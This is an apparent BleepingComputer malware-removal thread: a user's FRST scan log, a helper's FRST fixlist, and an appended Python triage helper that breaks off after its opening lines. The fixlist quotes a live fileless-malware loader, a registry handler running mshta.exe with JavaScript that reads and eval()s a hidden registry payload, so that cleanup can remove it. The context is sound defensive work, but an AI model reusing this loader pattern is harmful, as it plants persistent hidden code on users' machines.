R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7183632 2016-07-18] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-06-29] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-06-29] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108304 2016-06-29] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-06-29] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-06-29] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-06-29] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [473592 2016-07-13] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [162904 2016-06-29] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [292704 2016-08-05] (AVAST Software)
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-06-26] (GFI Software)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-07-27] (Malwarebytes)
S3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
R3 SmbDrv; C:\Windows\system32\DRIVERS\Smb_driver.sys [20016 2011-10-14] (Synaptics Incorporated)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2016-08-06] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-08 10:49 - 2016-08-08 10:50 - 00028095 _____ C:\Users\Greg\Desktop\FRST.txt
2016-08-08 10:39 - 2016-08-08 10:49 - 00000000 ____D C:\FRST
2016-08-08 08:51 - 2016-08-08 10:39 - 02393600 _____ (Farbar) C:\Users\Greg\Desktop\FRST64.exe
2016-08-08 07:23 - 2016-08-08 07:34 - 00000000 ____D C:\Users\Greg\Documents\8-8-2016
2016-08-06 18:09 - 2016-08-06 18:09 - 00002872 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-08-06 18:09 - 2016-08-06 18:09 - 00000863 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-08-06 18:09 - 2016-08-06 18:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-08-06 18:09 - 2016-08-06 18:09 - 00000000 ____D C:\Program Files\CCleaner
2016-08-06 14:21 - 2016-08-06 17:43 - 00000000 ____D C:\AdwCleaner
2016-08-06 14:20 - 2016-08-06 14:21 - 03712064 _____ C:\Users\Greg\Downloads\adwcleaner_5.201.exe
2016-08-06 12:48 - 2016-08-06 18:09 - 08136664 _____ (Piriform Ltd) C:\Users\Greg\Downloads\ccsetup520.exe
2016-08-06 12:48 - 2016-08-06 12:48 - 08136664 _____ (Piriform Ltd) C:\Users\Greg\Downloads\ccsetup520 (1).exe
2016-08-06 08:34 - 2016-08-06 08:34 - 00000000 ____D C:\Users\Greg\Downloads\backups
2016-08-06 08:25 - 2016-08-06 08:25 - 00015882 _____ C:\Users\Greg\Downloads\hijackthis after hitman
2016-08-06 08:10 - 2016-08-06 08:10 - 00004498 _____ C:\WINDOWS\system32\.crusader
2016-08-06 07:46 - 2016-08-06 08:11 - 00000000 ____D C:\ProgramData\HitmanPro
2016-08-05 10:37 - 2016-08-06 07:46 - 11438608 _____ (SurfRight B.V.) C:\Users\Greg\Downloads\hitmanpro_x64.exe
2016-08-05 09:37 - 2016-08-06 20:07 - 00000000 ____D C:\Users\Greg\AppData\Local\CrashDumps
2016-08-05 09:12 - 2016-08-05 09:12 - 00007330 _____ C:\Users\Greg\Downloads\Rouge Killer 1st scan.txt
2016-08-05 08:11 - 2016-08-06 12:46 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2016-08-05 08:09 - 2016-08-05 08:09 - 25356360 _____ C:\Users\Greg\Downloads\RogueKillerX64.exe
2016-08-05 08:09 - 2016-08-05 08:09 - 00000000 ____D C:\ProgramData\RogueKiller
2016-08-04 11:34 - 2016-08-04 11:34 - 00000000 ____D C:\Users\Greg Main Acct\Documents\ProcAlyzer Dumps
2016-08-04 09:18 - 2016-08-04 09:18 - 00000000 ____D C:\Program Files\Common Files\AV
2016-08-04 09:18 - 2015-07-28 17:52 - 00821920 _____ (Safer-Networking Ltd. ) C:\Users\Public\Desktop\Post Win10 Spybot-install.exe
2016-08-04 09:06 - 2016-08-04 11:32 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-08-04 09:06 - 2016-08-04 09:30 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-08-04 09:06 - 2016-08-04 09:06 - 00001460 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-08-04 09:06 - 2016-08-04 09:06 - 00001448 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2016-08-04 09:06 - 2016-08-04 09:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-08-04 09:06 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\WINDOWS\system32\sdnclean64.exe
2016-08-04 09:03 - 2016-08-04 09:03 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Greg\Downloads\spybot-2.4.exe
2016-08-04 08:42 - 2016-08-04 08:42 - 00388608 _____ (Trend Micro Inc.) C:\Users\Greg\Downloads\HijackThis.exe
2016-08-03 11:17 - 2016-08-03 11:17 - 00001994 _____ C:\Users\Greg Main Acct\Desktop\JRT.txt
2016-08-03 11:04 - 2016-08-03 11:05 - 105268120 _____ (Hewlett-Packard ) C:\Users\Greg\Downloads\sp50701.exe
2016-08-03 03:07 - 2016-08-03 03:07 - 00001963 _____ C:\Users\Public\Desktop\Garmin Express.lnk
2016-08-03 03:07 - 2016-08-03 03:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-07-31 01:09 - 2016-08-02 09:02 - 00000000 _____ C:\WINDOWS\SysWOW64\last.dump
2016-07-28 16:05 - 2016-07-28 16:05 - 01940430 ____N C:\Users\Greg\Documents\Scan0041.pdf
2016-07-28 16:03 - 2016-07-28 16:03 - 00745150 ____N C:\Users\Greg\Documents\Scan0040.pdf
2016-07-28 16:00 - 2016-07-28 16:00 - 01196295 ____N C:\Users\Greg\Documents\Scan0039.pdf
2016-07-27 16:06 - 2016-07-27 16:07 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-07-27 16:06 - 2016-07-27 16:06 - 00001171 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-07-27 16:06 - 2016-07-27 16:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-07-27 16:06 - 2016-07-27 16:06 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-07-27 16:06 - 2016-07-27 16:06 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-07-27 16:06 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-07-27 16:06 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-07-27 16:06 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-07-27 16:04 - 2016-07-27 16:05 - 22851472 _____ (Malwarebytes ) C:\Users\Greg\Downloads\mbam-setup-2.2.1.1043.exe
2016-07-25 16:43 - 2016-07-27 15:53 - 00000000 ____D C:\Users\Greg Main Acct\AppData\Local\ElevatedDiagnostics
2016-07-25 15:03 - 2016-06-29 13:38 - 00390984 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2016-07-24 17:12 - 2016-07-27 17:29 - 00000000 ____D C:\Users\Greg\Documents\Sound recordings
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default\AppData\Roaming\Macromedia
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default\AppData\Roaming\Adobe
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default\AppData\Local\Adobe
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Macromedia
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Adobe
2016-07-19 08:55 - 2016-07-19 08:55 - 00000000 ____D C:\Users\Default User\AppData\Local\Adobe
2016-07-15 11:27 - 2016-08-06 18:19 - 00000000 ____D C:\Users\Greg\AppData\Local\a82409
2016-07-15 11:27 - 2016-07-15 11:27 - 00000000 ____D C:\Users\Greg\AppData\Roaming\f08b1d
2016-07-13 11:12 - 2016-07-13 11:12 - 06079168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-08 10:48 - 2010-12-07 11:03 - 00000000 ____D C:\Users\Greg\AppData\Roaming\Skype
2016-08-08 10:21 - 2015-06-15 17:54 - 00000572 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-56867686-1103405722-4171089578-1000.job
2016-08-08 10:12 - 2012-04-21 11:01 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-08-08 10:07 - 2015-05-17 09:57 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-08-08 09:32 - 2015-06-15 17:59 - 00000668 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-56867686-1103405722-4171089578-1000.job
2016-08-08 08:34 - 2010-12-07 15:09 - 00000000 ____D C:\Users\Greg\AppData\Roaming\ArcSoft
2016-08-08 07:51 - 2016-02-06 16:41 - 00000000 ____D C:\Users\Greg
2016-08-08 07:22 - 2016-02-06 16:40 - 01009756 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-08-08 07:22 - 2015-10-30 03:21 - 00000000 ____D C:\WINDOWS\INF
2016-08-08 06:31 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-08-08 01:00 - 2015-02-06 23:30 - 00000394 ____H C:\WINDOWS\Tasks\{C2878297-853F-44A9-9F89-629C6496C233}.job
2016-08-07 18:13 - 2015-10-30 03:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-08-07 17:07 - 2012-11-11 13:56 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-08-07 15:26 - 2015-07-30 09:44 - 00003228 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForGreg
2016-08-07 15:26 - 2015-07-30 09:44 - 00000344 _____ C:\WINDOWS\Tasks\HPCeeScheduleForGreg.job
2016-08-07 01:00 - 2015-02-06 23:31 - 00000394 ____H C:\WINDOWS\Tasks\{F42C3EB7-610F-4853-9D19-614BCECFC75C}.job
2016-08-06 18:19 - 2014-02-05 13:19 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-08-06 18:16 - 2016-02-06 17:05 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-08-06 18:15 - 2015-10-30 02:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-08-06 11:57 - 2010-12-07 11:03 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-08-06 11:57 - 2010-07-15 16:44 - 00000000 ____D C:\ProgramData\Skype
2016-08-06 07:46 - 2016-02-06 20:04 - 00000000 ____D C:\Users\Greg Main Acct
2016-08-06 05:35 - 2015-10-30 03:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-08-05 09:25 - 2016-02-07 11:16 - 00292704 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswvmm.sys
2016-08-04 12:33 - 2016-02-07 11:30 - 00000000 ____D C:\Users\DefaultAppPool
2016-08-04 10:12 - 2016-06-09 15:41 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-08-03 18:19 - 2015-02-07 12:53 - 00000000 ____D C:\Users\Greg\AppData\Roaming\vlc
2016-08-03 11:07 - 2010-11-03 01:40 - 00000000 ___HD C:\Program Files (x86)\Temp
2016-08-03 03:08 - 2015-06-22 17:10 - 00000000 ____D C:\ProgramData\Package Cache
2016-08-03 03:07 - 2015-06-22 17:12 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-08-03 03:07 - 2015-06-22 17:11 - 00003624 _____ C:\WINDOWS\System32\Tasks\GarminUpdaterTask
2016-08-02 16:20 - 2016-02-06 16:38 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-08-01 15:39 - 2010-12-07 15:38 - 00000000 ____D C:\Users\Greg\AppData\Roaming\HpUpdate
2016-08-01 13:48 - 2016-03-01 13:08 - 00000000 ____D C:\Users\Greg\Documents\MasterCard & Visa Assessments Oct 2
2016-07-28 17:02 - 2015-05-17 09:57 - 00003980 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-07-28 17:02 - 2015-05-17 09:56 - 00003748 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-07-28 16:15 - 2010-12-07 12:42 - 00000000 ____D C:\Users\Greg\Documents\Clover Valley
2016-07-28 10:26 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-07-28 10:13 - 2016-02-07 11:16 - 00004278 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-07-27 17:59 - 2010-12-07 12:42 - 00000000 ____D C:\Users\Greg\Documents\Clover Valley Proposal
2016-07-26 15:43 - 2016-02-07 11:34 - 00001040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-07-26 15:43 - 2016-02-07 11:34 - 00001028 _____ C:\Users\Public\Desktop\TeamViewer 11.lnk
2016-07-25 15:05 - 2016-03-22 18:21 - 00004004 _____ C:\WINDOWS\System32\Tasks\SafeZone scheduled Autoupdate 1458685296
2016-07-25 15:05 - 2016-03-22 18:21 - 00001082 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-07-25 15:05 - 2016-02-07 11:20 - 00001979 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast Free Antivirus.lnk
2016-07-25 15:05 - 2016-02-07 11:20 - 00001967 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-07-25 14:56 - 2016-01-11 14:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-07-25 14:56 - 2015-10-30 05:07 - 00000000 ____D C:\WINDOWS\ShellNew
2016-07-25 14:56 - 2015-10-30 05:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 __RSD C:\WINDOWS\Media
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\setup
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\icsxml
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\Provisioning
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-07-25 14:56 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\L2Schemas
2016-07-25 14:56 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-07-25 14:56 - 2015-10-30 02:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-07-25 14:41 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\registration
2016-07-19 09:48 - 2016-05-05 13:05 - 00000000 ____D C:\Users\Greg\AppData\Local\MicrosoftEdge
2016-07-19 09:20 - 2015-02-07 12:52 - 00000958 _____ C:\Users\Public\Desktop\VLC media player.lnk
2016-07-19 08:55 - 2010-07-15 16:45 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-07-16 11:16 - 2015-05-28 18:20 - 00000000 ____D C:\Users\Greg\Documents\Letters and Thought
2016-07-14 14:50 - 2015-01-03 17:17 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-07-13 16:23 - 2016-02-07 11:16 - 00473592 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2016-07-13 13:11 - 2013-08-19 09:19 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-07-13 12:55 - 2011-12-20 10:21 - 144749672 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-07-13 11:12 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-07-13 11:12 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-07-12 08:32 - 2015-10-30 02:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI(53)

==================== Files in the root of some directories =======

2013-02-06 14:48 - 2013-02-06 14:48 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-12-07 11:04 - 2010-12-07 11:04 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2010-12-07 15:34 - 2016-02-07 10:55 - 0002760 _____ () C:\ProgramData\hpzinstall.log
2010-11-03 01:47 - 2010-11-03 01:47 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-15 17:11 - 2010-07-15 17:12 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-11-03 01:46 - 2010-11-03 01:46 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-15 17:07 - 2010-07-15 17:07 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-11-03 01:46 - 2010-11-03 01:46 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-11-03 01:46 - 2010-11-03 01:46 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-15 17:06 - 2010-07-15 17:06 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-15 17:07 - 2010-07-15 17:11 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-11-03 01:47 - 2010-11-03 01:47 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

Files to move or delete:
====================
C:\Windows\Tasks\{C2878297-853F-44A9-9F89-629C6496C233}.job
C:\Windows\Tasks\{F42C3EB7-610F-4853-9D19-614BCECFC75C}.job

Some files in TEMP:
====================
C:\Users\Greg\AppData\Local\Temp\jre-8u101-windows-au.exe
C:\Users\Greg\AppData\Local\Temp\jre-8u91-windows-au.exe
C:\Users\Greg\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Greg Main Acct\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-05 09:41

==================== End of FRST.txt ============================


#2 nasdaq
Malware Response Team, Montreal, QC. Canada
Posted 09 August 2016 - 09:50 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click OK.

Please copy the entire contents of the code box below to a new file.

Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [**cfdcc<*>] => "C:\Users\Greg\AppData\Local\a82409\63a99d.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\88ab92.lnk [2016-08-06]
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk [2016-08-06]
ShortcutTarget: df1157.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicyScripts-x32: Restriction <======= ATTENTION
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\avg_igeared.xml [2011-05-30]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml [2014-08-26]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} [2011-01-24] [not signed]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14] [not signed]
CHR Extension: (Avast Online Security) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-08-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-05]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath
C:\Users\Greg\AppData\Local\a82409
C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\88ab92.lnk
C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk
Task: {2CD25754-13AA-4775-B30F-F0607745C1F6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {51C1E536-747F-4B34-840F-D0914E0355F5} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5B16E285-B289-421B-99E7-A12B163EE510} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5D3F78A7-82CA-4FAD-90E0-89D7AC31A69C} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {6A7B26ED-20DF-4D37-B1DD-5BE116E84B90} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {76A4380F-3D18-49F7-91FA-E28BA06D8AE8} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {928CFA40-274E-4744-AE9D-B6368CD25CFF} - \Microsoft\Windows Defender\MP Scheduled Scan -> No File <==== ATTENTION
Task: {D1D0EB61-0014-47B5-8382-2F0E44CF7A8E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {D1E3F3E1-731E-45E4-86AD-ABAF3DAAA5F9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E499F8F0-A04A-47B8-8BAC-E498442C0399} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E94FE054-1715-4313-8BF0-E7CD02F28C77} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {EF109252-8D17-40B7-9D01-75B7341DA22A} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F3502C3B-DF07-4A3F-A123-D2D20CF4E814} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {F76C1D00-C776-4D7F-9828-7B4ADC39D3EB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Classes\b60943: "C:\WINDOWS\system32\mshta.exe" "javascript:JpF0uO8C="1Z";JY2=new ActiveXObject("WScript.Shell");HRZ4b8P="6";M7Hm0H=JY2.RegRead("HKCU\\software\\isikjeeris\\xiyj");yej7u0l="MobpLa44";eval(M7Hm0H);hXOb3M8Tz="lnlLm";" <===== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old version(s) of Java via the Control Panel > Programs and Features.
Java 8 Update 91 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418091F0}) (Version: 8.0.910.15 - Oracle Corporation)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)

===

Please post the log and let me know what problem persists with this computer.
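A triage helper added here as an example; it is not FRST's code, nasdaq's fixlist, or anything the thread itself ran. It reads FRST log text (the "One Month Created files" listing earlier in the thread and the fixlist lines above) and flags the chain those lines describe: six-hex-character folders created under AppData, a Run value whose name FRST could not print and whose target is a .lnk inside such a folder, a Startup shortcut that launches cmd.exe, a service with no ImagePath, and a Software\Classes handler that runs mshta.exe with a javascript: URL that RegRead()s and eval()s a payload stored elsewhere in HKCU. The sample lines are copied from the log quoted in the thread; three benign control lines (ExampleUpdater, Example.lnk, C:\FRST) are made up for contrast, and the indicator names and the LOLBin list are this example's own choices.

```python
"""Triage FRST log text for the persistence chain seen in this thread.

Added example, not FRST's code or the helper's fixlist: it parses lines of an
FRST log (a text file) rather than the live registry, so it runs offline.
Indicator names are this example's own; the six-hex-character folder heuristic
comes from the folder names quoted in the thread (a82409, f08b1d).
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample: lines copied from the FRST output quoted in the thread,
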